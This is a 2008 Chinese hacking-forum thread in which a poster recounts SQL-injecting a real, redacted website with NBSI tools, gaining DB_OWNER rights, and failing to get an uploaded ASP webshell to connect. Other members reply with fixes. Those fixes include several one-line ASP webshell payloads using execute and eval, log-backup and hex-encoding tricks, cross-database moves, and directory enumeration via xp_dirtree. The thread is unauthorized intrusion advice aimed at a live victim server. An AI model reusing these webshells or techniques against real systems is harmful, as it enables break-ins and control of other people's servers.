【3.A.S.T】网络安全爱好者 » 技术交流 » [讨论]关于注入后得到DB_OWNER权限的Getwebshell提交成功却无法连接

返回列表发帖

3.A.S.T少校

Rank: 5 Rank: 5

帖子: 198
积分: 509
威望: 816
金钱: 666
在线时间: 1 小时

灌水王

1楼 跳转到 » 倒序看帖

字体大小: tT

发表于 2008-7-20 23:21 | 只看该作者

[讨论]关于注入后得到DB_OWNER权限的Getwebshell提交成功却无法连接

OWNER, Getwebshell, 权限, 讨论

[讨论]关于注入后得到DB_OWNER权限的Getwebshell提交成功却无法连接
议题作者：Yyb1813
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

经过几小时的测试，依然没办法将站拿下传马不成功。

使用软件nbsi3.0找到注入点，权限为：DB_OWNER,知用户名不知密码，拿到数据库：tv_Data

使用nbsi3.0查找目录却无法查到网站目录，应而使用明小子猜到同一服务器下的一目录为：e:\web\mpo\此站点支持asp 并且网站为: http://www.***.com/ 可以打开。

使用nbsi3.0自带的Getwebshell却无法将文件写入e:\web\mpo\001.asp
查看发现001.asp写不进去。

使用GetWebshellah56bug大众版.也不行。

最后使用：xiaolu写的Getwebshell提交后将文件成功写入。查看：e:\web\mpo\001.asp
存在。

打开对应网站：http://www.***.com/ 001.asp提示如下：

Microsoft VBScript 编译器错误错误 '800a0408'

无效字符

/001.asp，行 4338

I?扴?

=============为什么会这样？？？
我用一句话修改去连接无效。用蓝屏一句话连接也无效，修改xiaolu写的Getwebshell为蓝屏等的连接：<%execute request("l")%>
多种方法还是没办法成功，连接不上。

我要如何做了。搞了一天没解决。

[s:92]
帖子66 精华0 积分209 阅读权限40 在线时间46 小时注册时间2006-1-19 最后登录2008-7-12 查看详细资料引用报告回复 TOP 少女暴富的隐秘（图）

first_0

晶莹剔透§烈日灼然

3.A.S.T士兵

Rank: 1

帖子: 7
积分: 11
威望: 14
金钱: 10
在线时间: 0 小时

2楼

发表于 2008-7-20 23:21 | 只看该作者

数据库不干净，有权限的话，换个数据库备
帖子12 精华0 积分64 阅读权限40 在线时间0 小时注册时间2005-2-22 最后登录2007-11-29 查看详细资料引用报告回复 TOP 少女暴富的隐秘（图）

virus-y2k

晶莹剔透§烈日灼然

3.A.S.T士兵

Rank: 1

帖子: 8
积分: 12
威望: 16
金钱: 16
在线时间: 0 小时

3楼

发表于 2008-7-20 23:21 | 只看该作者

这个简单。。用臭要饭的webshell导入大法吧~
帖子42 精华0 积分149 阅读权限40 性别男在线时间7 小时注册时间2006-3-24 最后登录2008-1-11 查看详细资料引用报告回复 TOP 您知道您年薪应是多少?

安静

晶莹剔透§烈日灼然

3.A.S.T士兵

Rank: 1

帖子: 12
积分: 18
威望: 24
金钱: 24
在线时间: 0 小时

4楼

发表于 2008-7-20 23:21 | 只看该作者

手工log备份比较好~
最好是用16进制
帖子4 精华0 积分19 阅读权限40 在线时间9 小时注册时间2005-7-6 最后登录2007-3-22 查看详细资料引用报告回复 TOP

hack520

运维管理组

3.A.S.T士兵

Rank: 1

帖子: 19
积分: 29
威望: 38
金钱: 38
在线时间: 0 小时

5楼

发表于 2008-7-20 23:21 | 只看该作者

[s:75] 没插进去~~~~到insert那步出错了...建议换个库插插插 [s:82]Www.China-Mu.Co.Kr 猪毛奇迹 1.02Q 将带给你无比的震撼。
帖子1082 精华6 积分5597 阅读权限150 性别男在线时间576 小时注册时间2005-3-18 最后登录2008-7-2 查看个人网站
查看详细资料引用报告回复 TOP 软件项目外包

yyb1813

晶莹剔透§烈日灼然

3.A.S.T士兵

Rank: 1

帖子: 30
积分: 45
威望: 60
金钱: 60
在线时间: 0 小时

6楼

发表于 2008-7-20 23:21 | 只看该作者

引用:
这里是引用第[5 楼]的hack520于2006-08-01 02:56发表的：
[s:75] 没插进去~~~~到insert那步出错了...建议换个库插插插 [s:82]
猪三哥啊，我天天在啃你的注入，都没搞掂，现在这个飞了。
呵呵。这是宁波的服务器，现在给他发现了，什么权限都没有了，什么文件夹都设成只读了，哎，没了没了！
帖子66 精华0 积分209 阅读权限40 在线时间46 小时注册时间2006-1-19 最后登录2008-7-12 查看详细资料引用报告回复 TOP 让女孩一夜变的更有女人味

kuangzhu

晶莹剔透§烈日灼然

3.A.S.T士兵

Rank: 1

帖子: 12
积分: 18
威望: 24
金钱: 21
在线时间: 0 小时

7楼

发表于 2008-7-20 23:21 | 只看该作者

换冰狐的那个小马插然后用一句话客户连也可以我试过
帖子2 精华0 积分9 阅读权限40 在线时间2 小时注册时间2005-11-1 最后登录2007-1-5 查看详细资料引用报告回复 TOP 让女孩一夜变的更有女人味

神無月

晶莹剔透§烈日灼然

3.A.S.T士兵

Rank: 1

帖子: 17
积分: 26
威望: 34
金钱: 24
在线时间: 0 小时

8楼

发表于 2008-7-20 23:21 | 只看该作者

用EVAL吧
不行就试试转换一下一句马
<%execute(request("l"))%>
<%%25execute(request("l"))%%25>都试试吧。~
帖子124 精华0 积分313 阅读权限40 性别男在线时间37 小时注册时间2006-4-22 最后登录2008-6-9 查看详细资料引用报告回复 TOP

remax

晶莹剔透§烈日灼然

3.A.S.T士兵

Rank: 1

帖子: 20
积分: 30
威望: 39
金钱: 39
在线时间: 0 小时

9楼

发表于 2008-7-20 23:22 | 只看该作者

估计是数据库里有%,反正出不来~。~20字节够写什么？

帖子325 精华2 积分911 阅读权限50 在线时间79 小时注册时间2005-10-25 最后登录2008-7-13 查看个人网站
查看详细资料引用报告回复 TOP

唐不狐
很黃很暴力

晶莹剔透§烈日灼然

3.A.S.T士兵

Rank: 1

帖子: 31
积分: 47
威望: 62
金钱: 57
在线时间: 0 小时

10楼

发表于 2008-7-20 23:22 | 只看该作者

遇到过
1 重新寻找注射点，目的是换库。这点注射工具可检测出
2 多次备份。还是用导出日志大法比较好，备份出来的文件大小都比较理想
帖子145 精华2 积分574 阅读权限50 性别男来自china 在线时间106 小时注册时间2005-9-27 最后登录2008-7-9 查看个人网站
查看详细资料引用报告回复 TOP

popo0421

晶莹剔透§烈日灼然

3.A.S.T士兵

Rank: 1

帖子: 14
积分: 21
威望: 28
金钱: 28
在线时间: 0 小时

11楼

发表于 2008-7-20 23:22 | 只看该作者

可能是服务器的asp 过滤了一些东西,换个注入点再试试,
找不同目录下的asp , 应该可以找出不同数据库的可用注入点
帖子8 精华0 积分30 阅读权限40 性别男在线时间0 小时注册时间2006-1-9 最后登录2008-2-4 查看详细资料引用报告回复 TOP

独孤依人

荣誉会员

3.A.S.T少尉

Rank: 2

帖子: 41
积分: 61
威望: 80
金钱: 76
在线时间: 0 小时

12楼

发表于 2008-7-20 23:22 | 只看该作者

可能你备份的目录没有写入权限脚本安全小组：Www.Cnsst.Org MSN:cn557@hotmail.com 我们这帮兄弟，永远的兄弟——We are not the only ones,but we will try to be the best！——All In Script 脚本渗透自用利器开发中……
帖子298 精华12 积分3962 阅读权限100 性别男在线时间901 小时注册时间2006-4-22 最后登录2008-7-18 查看详细资料引用报告回复 TOP

--------

晶莹剔透§烈日灼然

3.A.S.T士兵

Rank: 1

帖子: 9
积分: 14
威望: 18
金钱: 18
在线时间: 0 小时

13楼

发表于 2008-7-20 23:22 | 只看该作者

Sql db_owner权限注入成功之后,
通过读取注册表拿web路径,但没权限,读取失败.
现在改用xp_redtree过程读取硬盘目录,能读取,并且保存在test表中,
通过openrowset远程insert失败,提示连接失败(我自己计算机能连,它不能连,应该不是外部数据库问题吧).

想请教的是:现在如何读取test表的所有内容?
我想过用猜解,但是怕慢.

有人有更好方法吗
帖子3 精华0 积分10 阅读权限40 在线时间66 小时注册时间2006-7-27 最后登录2008-6-6 查看详细资料引用报告回复 TOP

asm

运维管理组

POLO劲情～怀

3.A.S.T士兵

Rank: 1

帖子: 20
积分: 30
威望: 40
金钱: 36
在线时间: 0 小时

14楼

发表于 2008-7-20 23:22 | 只看该作者

如果是要入侵，那就换别的方法，别吊死在一棵树上

如果是解决这个问题，我建议你去查查关于asp的错误号，估计会有眉目...游戏吧 http://www.game8.cc/MyBlog http://www.asm32.cn
帖子1598 精华30 积分8742 阅读权限150 性别男在线时间954 小时注册时间2006-9-21 最后登录2008-7-20 查看详细资料引用报告回复 TOP

r00t

晶莹剔透§烈日灼然

3.A.S.T士兵

Rank: 1

帖子: 11
积分: 17
威望: 22
金钱: 22
在线时间: 0 小时

15楼

发表于 2008-7-20 23:22 | 只看该作者

如果找到库的位置，手动LOG备份吧，就象楼楼上的最好用16进制的。
帖子2 精华0 积分12 阅读权限40 在线时间0 小时注册时间2006-7-11 最后登录2006-10-12 查看详细资料引用报告回复 TOP

tlhelen

晶莹剔透§烈日灼然

3.A.S.T士兵

Rank: 1

帖子: 33
积分: 51
威望: 68
金钱: 60
在线时间: 0 小时

16楼

发表于 2008-7-20 23:22 | 只看该作者

一句话木马成功依赖于两个条件：
１、服务端没有禁止adodb.Stream或FSO组件
２、权限问题：如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
帖子19 精华0 积分57 阅读权限40 在线时间51 小时注册时间2005-10-18 最后登录2008-3-24 查看详细资料引用报告回复 TOP

xg530

晶莹剔透§烈日灼然

3.A.S.T士兵

Rank: 1

帖子: 28
积分: 42
威望: 55
金钱: 40
在线时间: 0 小时

17楼

发表于 2008-7-20 23:22 | 只看该作者

谁有aspx的一句话啊`找了好长时间没找到了```郁闷死`
帖子16 精华0 积分51 阅读权限40 在线时间44 小时注册时间2005-8-30 最后登录2008-3-28 查看详细资料引用报告回复 TOP

justcrack

荣誉会员

3.A.S.T士兵

Rank: 1

帖子: 21
积分: 32
威望: 42
金钱: 42
在线时间: 0 小时

18楼

发表于 2008-7-20 23:22 | 只看该作者

引用:
引用第10楼唐不狐于2006-08-16 22:10发表的:
遇到过
1 重新寻找注射点，目的是换库。这点注射工具可检测出
2 多次备份。还是用导出日志大法比较好，备份出来的文件大小都比较理想
如果有其他库权限直接跨库就可以了。
个人认为一个站多个数据库又有多个注射点对应不同库的几率不如一个用户多个库的权限的几率大。广告位招租。
帖子40 精华0 积分196804 阅读权限100 在线时间86 小时注册时间2006-2-2 最后登录2008-2-21 查看详细资料引用报告回复 TOP

freedom

晶莹剔透§烈日灼然

3.A.S.T士兵

Rank: 1

帖子: 8
积分: 12
威望: 16
金钱: 14
在线时间: 0 小时

19楼

发表于 2008-7-20 23:22 | 只看该作者

换成这样试试<%eval(request("l"))%>。或改变为十六进制。
顺便借此宝地问一下DB_OWNER权限下怎样用SQL语句暴出网站路径努力就会成功
帖子6 精华0 积分23 阅读权限40 性别男在线时间46 小时注册时间2005-8-4 最后登录2008-7-20 查看详细资料引用报告回复 TOP

jxsaqjh

晶莹剔透§烈日灼然

3.A.S.T士兵

Rank: 1

帖子: 15
积分: 23
威望: 30
金钱: 29
在线时间: 0 小时

20楼

发表于 2008-7-20 23:22 | 只看该作者

我也遇到过，一句已经写入成功，可是旧在上船木马的时候不成功。。
或者是提示上船成功，可是连接出现404，或者干脆旧不能上船jxsaqjh.cn

帖子36 精华0 积分99 阅读权限40 性别男在线时间15 小时注册时间2006-10-23 最后登录2008-4-9 查看详细资料引用报告回复 TOP

qmttz

晶莹剔透§烈日灼然